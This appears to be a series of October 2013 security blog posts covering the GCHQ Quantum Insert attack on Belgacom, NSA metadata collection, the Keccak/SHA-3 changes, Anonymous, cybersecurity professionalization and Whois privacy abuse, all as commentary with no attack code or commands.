According to the slides in the GCHQ presentation, the attack was directed at several Belgacom employees and involved the planting of a highly developed attack technology referred to as a “Quantum Insert” (“QI”). It appears to be a method with which the person being targeted, without their knowledge, is redirected to websites that then plant malware on their computers that can then manipulate them. Some of the employees whose computers were infiltrated had “good access” to important parts of Belgacom’s infrastructure, and this seemed to please the British spies, according to the slides.

That should be “QUANTUMINSERT.” This is getting frustrating. The NSA really should release a style guide for press organizations publishing their secrets.

And the URL in the essay (now redacted at the Guardian site) was registered within minutes of the story posting, and is being used to serve malware. Don’t click on it.

Posted on October 7, 2013 at 6:24 AM129 Comments

Developments in Microphone Technology

What’s interesting is that this matchstick-sized microphone can be attached to drones.

Conventional microphones work when sound waves make a diaphragm move, creating an electrical signal. Microflown’s sensor has no moving parts. It consists of two parallel platinum strips, each just 200 nanometres deep, that are heated to 200° C. Air molecules flowing across the strips cause temperature differences between the pair. Microflown’s software counts the air molecules that pass through the gap between the strips to gauge sound intensity: the more air molecules in a sound wave, the louder the sound. At the same time, it analyses the temperature change in the strips to work out the movement of the air and calculate the coordinates of whatever generated the sound.

EDITED TO ADD (10/6): This seems not to be a microphone, but an acoustic sensor. It can locate sound, but cannot differentiate speech.

Posted on October 4, 2013 at 6:59 AM68 Comments

Is Cybersecurity a Profession?

A National Academy of Sciences panel says no:

Sticking to the quality control aspect of the report, professionalization, it says, has the potential to attract workers and establish long-term paths to improving the work force overall, but measures such as standardized education or requirements for certification, have their disadvantages too.

For example, formal education or certification could be helpful to employers looking to evaluate the skills and knowledge of a given applicant, but it takes time to develop curriculum and reach a consensus on what core knowledge and skills should be assessed in order to award any such certification. For direct examples of such a quandary, InfoSec needs only to look at the existing certification programs, and the criticisms directed that certifications such as the CISSP and C|EH.

Once a certification is issued, the previously mentioned barriers start to emerge. The standards used to award certifications will run the risk of becoming obsolete. Furthermore, workers may not have incentives to update their skills in order to remain current. Again, this issue is seen in the industry today, as some professionals chose to let their certifications lapse rather than renew them or try and collect the required CPE credits.

But the largest barrier is that some of the most talented individuals in cybersecurity are self-taught. So the requirement of formal education or training may, as mentioned, deter potential employees from entering the field at a time when they are needed the most. So while professionalization may be a useful tool in some circumstances, the report notes, it shouldn’t be used as a proxy for “better.”

Here’s the report.

Posted on October 3, 2013 at 12:55 PM41 Comments

On Anonymous

Gabriella Coleman has published an interesting analysis of the hacker group Anonymous:

Abstract: Since 2010, digital direct action, including leaks, hacking and mass protest, has become a regular feature of political life on the Internet. The source, strengths and weakness of this activity are considered in this paper through an in-depth analysis of Anonymous, the protest ensemble that has been adept at magnifying issues, boosting existing ­ usually oppositional ­ movements and converting amorphous discontent into a tangible form. This paper, the third in the Internet Governance Paper Series, examines the intersecting elements that contribute to Anonymous’ contemporary geopolitical power: its ability to land media attention, its bold and recognizable aesthetics, its participatory openness, the misinformation that surrounds it and, in particular, its unpredictability.

Posted on October 3, 2013 at 6:43 AM21 Comments

On Secrecy

When everything is classified, then nothing is classified.”

I should suppose that moral, political, and practical considerations would dictate that a very first principle of that wisdom would be an insistence upon avoiding secrecy for its own sake. For when everything is classified, then nothing is classified, and the system becomes one to be disregarded by the cynical or the careless, and to be manipulated by those intent on self protection or self-promotion. I should suppose, in short, that the hallmark of a truly effective internal security system would be the maximum possible disclosure, recognizing that secrecy can best be preserved only when credibility is truly maintained.

Justice Stewart, New York Times v. United States, 1971.

Posted on October 2, 2013 at 1:28 PM62 Comments

NSA Storing Internet Data, Social Networking Data, on Pretty Much Everybody

Two new stories based on the Snowden documents.

This is getting silly. General Alexander just lied about this to Congress last week. The old NSA tactic of hiding behind a shell game of different code names is failing. It used to be they could get away with saying “Project X doesn’t do that,” knowing full well that Projects Y and Z did and that no one would call them on it. Now they’re just looking shiftier and shiftier.

The program the New York Times exposed is basically Total Information Awareness, which Congress defunded in 2003 because it was just too damned creepy. Now it’s back. (Actually, it never really went away. It just changed code names.)

I’m also curious how all those PRISM-era denials from Internet companies about the NSA not having “direct access” to their servers jibes with this paragraph:

The overall volume of metadata collected by the N.S.A. is reflected in the agency’s secret 2013 budget request to Congress. The budget document, disclosed by Mr. Snowden, shows that the agency is pouring money and manpower into creating a metadata repository capable of taking in 20 billion “record events” daily and making them available to N.S.A. analysts within 60 minutes.

Honestly, I think the details matter less and less. We have to assume that the NSA has everyone who uses electronic communications under constant surveillance. New details about hows and whys will continue to emerge—for example, now we know the NSA’s repository contains travel data—but the big picture will remain the same.

Related: I’ve said that it seems that the NSA now has a PR firm advising it on response. It’s trying to teach General Alexander how to better respond to questioning.

Also related: A cute flowchart on how to avoid NSA surveillance.

Posted on October 1, 2013 at 1:08 PM67 Comments

Will Keccak = SHA-3?

Last year, NIST selected Keccak as the winner of the SHA-3 hash function competition. Yes, I would have rather my own Skein had won, but it was a good choice.

But last August, John Kelsey announced some changes to Keccak in a talk (slides 44-48 are relevant). Basically, the security levels were reduced and some internal changes to the algorithm were made, all in the name of software performance.

Normally, this wouldn’t be a big deal. But in light of the Snowden documents that reveal that the NSA has attempted to intentionally weaken cryptographic standards, this is a huge deal. There is too much mistrust in the air. NIST risks publishing an algorithm that no one will trust and no one (except those forced) will use.

At this point, they simply have to standardize on Keccak as submitted and as selected.

CDT has a great post about this.

Also this Slashdot thread.

EDITED TO ADD (10/5): It’s worth reading the response from the Keccak team on this issue.

I misspoke when I wrote that NIST made “internal changes” to the algorithm. That was sloppy of me. The Keccak permutation remains unchanged. What NIST proposed was reducing the hash function’s capacity in the name of performance. One of Keccak’s nice features is that it’s highly tunable.

I do not believe that the NIST changes were suggested by the NSA. Nor do I believe that the changes make the algorithm easier to break by the NSA. I believe NIST made the changes in good faith, and the result is a better security/performance trade-off. My problem with the changes isn’t cryptographic, it’s perceptual. There is so little trust in the NSA right now, and that mistrust is reflecting on NIST. I worry that the changed algorithm won’t be accepted by an understandably skeptical security community, and that no one will use SHA-3 as a result.

This is a lousy outcome. NIST has done a great job with cryptographic competitions: both a decade ago with AES and now with SHA-3. This is just another effect of the NSA’s actions draining the trust out of the Internet.

Posted on October 1, 2013 at 10:50 AM57 Comments

WhoIs Privacy and Proxy Service Abuse

ICANN has a draft study that looks at abuse of the Whois database.

This study, conducted by the National Physical Laboratory (NPL) in the United Kingdom, analyzes gTLD domain names to measure whether the percentage of privacy/proxy use among domains engaged in illegal or harmful Internet activities is significantly greater than among domain names used for lawful Internet activities. Furthermore, this study compares these privacy/proxy percentages to other methods used to obscure identity ­ notably, Whois phone numbers that are invalid.

Richard Clayton, the primary author of the report, has a blog post:

However, it’s more interesting to ask whether this percentage is somewhat higher than the usage of privacy or proxy services for entirely lawful and harmless Internet activities? This turned out NOT to be the case ­ for example banks use privacy and proxy services almost as often as the registrants of domains used in the hosting of child sexual abuse images; and the registrants of domains used to host (legal) adult pornography use privacy and proxy services more often than most (but not all) of the different types of malicious activity that we studied.

Richard has been telling me about this work for a while. It’s nice to see it finally published.

Posted on October 1, 2013 at 9:09 AM14 Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.